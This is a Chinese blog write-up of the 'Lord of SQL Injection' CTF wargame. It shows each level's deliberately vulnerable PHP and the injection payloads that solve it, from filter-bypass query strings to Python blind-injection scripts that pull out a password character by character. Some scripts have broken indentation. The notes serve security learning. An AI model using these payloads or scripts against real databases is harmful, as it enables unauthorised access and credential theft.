2019-09-09 16:39 已编辑上海交通大学产品经理

关注

LORD OF SQLINJECTION-Writeup

网站：https://los.rubiya.kr/
参考了GitHub上的相应writeup和代码，记录下做题过程，以备日后学习之需。

gremlin
query : select id from prob_gremlin where id='' and pw=''
source code:

<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); // do not try to attack another table, database!
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) solve("gremlin");
highlight_file(__FILE__);
?>

解决方法：?id=' or '1'='1

cobolt
query : select id from prob_cobolt where id='' and pw=md5('')
source code:

<?php
include "./config.php"; 
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
$query = "select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id'] == 'admin') solve("cobolt");
elseif($result['id']) echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>"; 
highlight_file(__FILE__); 
?>

解决方法：?id=' or id='admin'%23
注：id为admin才行，否则会显示Hello rubiya You are not admin :(

goblin
query : select id from prob_goblin where id='guest' and no=

<?php 
include "./config.php"; 
login_chk(); 
$db = dbconnect(); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
if(preg_match('/\'|\"|\`/i', $_GET[no])) exit("No Quotes ~_~"); 
$query = "select id from prob_goblin where id='guest' and no={$_GET[no]}"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
if($result['id'] == 'admin') solve("goblin");
highlight_file(__FILE__); 
?>

解决方法：?no=' or id=0x61646d696e
注：不能有引号，0x61646D696E是admin的十六进制。可以用转码工具：https://tool.lu/hexstr/

orc(盲注)

<?php 
include "./config.php"; 
login_chk(); 
$db = dbconnect(); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
$query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id']) echo "<h2>Hello admin</h2>"; 

$_GET[pw] = addslashes($_GET[pw]); 
$query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc"); 
highlight_file(__FILE__); 
?>

解决方法：

import requests
url = 'https://los.rubiya.kr/chall/orc_xxx.php'#修改
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}
cookies={'PHPSESSID':'xxx'}#修改
length = 5
flag=""
while 1:
 params = {'pw': "' or length(pw)="+str(length)+"-- "}
 response = requests.get(url, headers=headers, cookies=cookies, params=params)
 status_code = response.status_code
 html_data = response.text
 print(response.url)
 if(html_data.find("Hello admin") != -1):
     print "Hello admin"
     print "length = "+str(length)
     break
 else:
     length+=1
for i in range(1,length+1):
 for j in range(48,123):
     params = {'pw': "' or id='admin' and  ascii(substr(pw,"+str(i)+",1))="+str(j)+"-- "}
     response = requests.get(url, headers=headers, cookies=cookies, params=params)
     status_code = response.status_code
     html_data = response.text
     print(response.url)
     if (html_data.find("Hello admin") != -1):
         print "Hello admin"
         flag+=chr(j)
         print flag
         break

注：学习了GitHub上noonzib/Lord-of-Sql-injection/blob/master/orc_ex.py，这个代码的思路，先盲注试出长度，然后盲注得出flag。后面几题盲注的代码结构也大致如此，在params上做出调整。

wolfman

<?php 
include "./config.php"; 
login_chk(); 
$db = dbconnect(); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~"); 
$query = "select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
if($result['id'] == 'admin') solve("wolfman"); 
highlight_file(__FILE__); 
?>

注：不能有空格，用||表示or关系。
解决方法：?pw=%27||id=%27admin%27%23

darkelf

<?php 
include "./config.php"; 
login_chk(); 
$db = dbconnect();  
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 
$query = "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
if($result['id'] == 'admin') solve("darkelf"); 
highlight_file(__FILE__); 
?>

注：不能有or、and，沿用||的方法。
解决方法：?pw=%27||id=%27admin%27%23

orge（盲注）

<?php 
include "./config.php"; 
login_chk(); 
$db = dbconnect(); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 
$query = "select id from prob_orge where id='guest' and pw='{$_GET[pw]}'"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 

$_GET[pw] = addslashes($_GET[pw]); 
$query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); 
highlight_file(__FILE__); 
?>

代码和orc那题一样。

troll

<?php  
include "./config.php"; 
login_chk(); 
dbconnect(); 
if(preg_match('/\'/i', $_GET[id])) exit("No Hack ~_~");
if(@ereg("admin",$_GET[id])) exit("HeHe");
$query = "select id from prob_troll where id='{$_GET[id]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id'] == 'admin') solve("troll");
highlight_file(__FILE__);
?>

解决方法：?id=Admin（任意字母改成大写即可）
注：sql不区分大小写，除非加binary区分。

vampire

<?php 
include "./config.php"; 
login_chk(); 
$db = dbconnect(); 
if(preg_match('/\'/i', $_GET[id])) exit("No Hack ~_~");
$_GET[id] = strtolower($_GET[id]);
$_GET[id] = str_replace("admin","",$_GET[id]); 
$query = "select id from prob_vampire where id='{$_GET[id]}'"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id'] == 'admin') solve("vampire"); 
highlight_file(__FILE__); 
?>

注：转小写、替换admin为空字符串。
解决方法：?id=adadminmin

skeleton

<?php 
include "./config.php"; 
login_chk(); 
$db = dbconnect(); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
$query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id'] == 'admin') solve("skeleton"); 
highlight_file(__FILE__); 
?>

注：井号作注释（%23）
解决方法：?pw=' or id='admin'%23

golem（盲注）

<?php 
include "./config.php"; 
login_chk(); 
$db = dbconnect(); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe"); 
$query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 

$_GET[pw] = addslashes($_GET[pw]); 
$query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem"); 
highlight_file(__FILE__); 
?>

注：不能用substr，换成mid，=换成like
部分代码：

while 1:
params = {'pw': "'||length(pw)<"+str(length)+"-- "}
response = requests.get(url, headers=headers, cookies=cookies, params=params)
status_code = response.status_code
html_data = response.text
print(response.url)
if(html_data.find("Hello admin") != -1):
    print "Hello admin"
    length -= 1
    print "length = "+str(length)
    break
else:
    length+=1
for i in range(1,length+1):
for j in range(48,123):
    params = {'pw': "'||id like 'admin'&&ascii(mid(pw,"+str(i)+",1)) like "+str(j)+"-- "}#主要是这步
    response = requests.get(url, headers=headers, cookies=cookies, params=params)
    status_code = response.status_code
    html_data = response.text
    print(response.url)
    if (html_data.find("Hello admin") != -1):
        print "Hello admin"
        flag+=chr(j)
        print flag
        break

darknight（盲注）

<?php 
include "./config.php"; 
login_chk(); 
$db = dbconnect(); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe"); 
$query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 

$_GET[pw] = addslashes($_GET[pw]); 
$query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 
highlight_file(__FILE__); 
?>

注：ascii换成ord
部分代码：

params = {'pw':'123','no':'-1 or id like "admin" and ord(mid(pw,'+str(i)+',1)) like '+str(j)+'-- '}

bugbear

<?php 
include "./config.php"; 
login_chk(); 
$db = dbconnect(); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe"); 
$query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 

$_GET[pw] = addslashes($_GET[pw]); 
$query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear"); 
highlight_file(__FILE__); 
?>

注：" " -> %0a & -> %26(url encoding)
代码：

query='?no=1%0a||%0aid%0ain%0a("admin")%0a%26%26%0ahex(mid(pw,'+str(i)+',1))%0ain%0a(hex('+str(j)+'))'

giant

<?php 
include "./config.php"; 
login_chk(); 
$db = dbconnect(); 
if(strlen($_GET[shit])>1) exit("No Hack ~_~"); 
if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe"); 
$query = "select 1234 from{$_GET[shit]}prob_giant where 1"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result[1234]) solve("giant"); 
highlight_file(__FILE__); 
?>

解决方法：?shit=%0b

assassin

<?php 
include "./config.php"; 
login_chk(); 
$db = dbconnect(); 
if(preg_match('/\'/i', $_GET[pw])) exit("No Hack ~_~"); 
$query = "select id from prob_assassin where pw like '{$_GET[pw]}'"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
if($result['id'] == 'admin') solve("assassin"); 
highlight_file(__FILE__); 
?>

代码：

text="Hello admin"
for i in range(1,10):
for j in range(48,127):
    token=0
    url = 'https://los.rubiya.kr/chall/assassin_xxx.php'
    url+="?pw="+flag+chr(j)+"%"
    response = requests.get(url, headers=headers, cookies=cookies)
    status_code = response.status_code
    html_data = response.text
    print(response.url)
    if (html_data.find(text) != -1):
        print ("Find Key[+]")
        flag+=chr(j)
        print (flag)
        token=1
        break
if(token==0):
    break

succubus

<?php
include "./config.php"; 
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/\'/',$_GET[id])) exit("HeHe");
if(preg_match('/\'/',$_GET[pw])) exit("HeHe");
$query = "select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id']) solve("succubus"); 
highlight_file(__FILE__); 
?>

解：?id=&pw=or true%23
即select id from prob_succubus where id ='' and pw=' or true#'，利用转义符号

zombie_assassin

<?php 
include "./config.php"; 
login_chk(); 
$db = dbconnect();
$_GET['id'] = strrev(addslashes($_GET['id']));
$_GET['pw'] = strrev(addslashes($_GET['pw']));
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
$query = "select id from prob_zombie_assassin where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id']) solve("zombie_assassin"); 
highlight_file(__FILE__); 
?>

解：?id=%00&pw=%231%20ro
即select id from prob_zombie_assassin where id='0' and pw='or 1#'
strrev反转字符串
eg:
addslashes($_GET['id']) : id = '
strrev( id ) : '
（2019-09-09）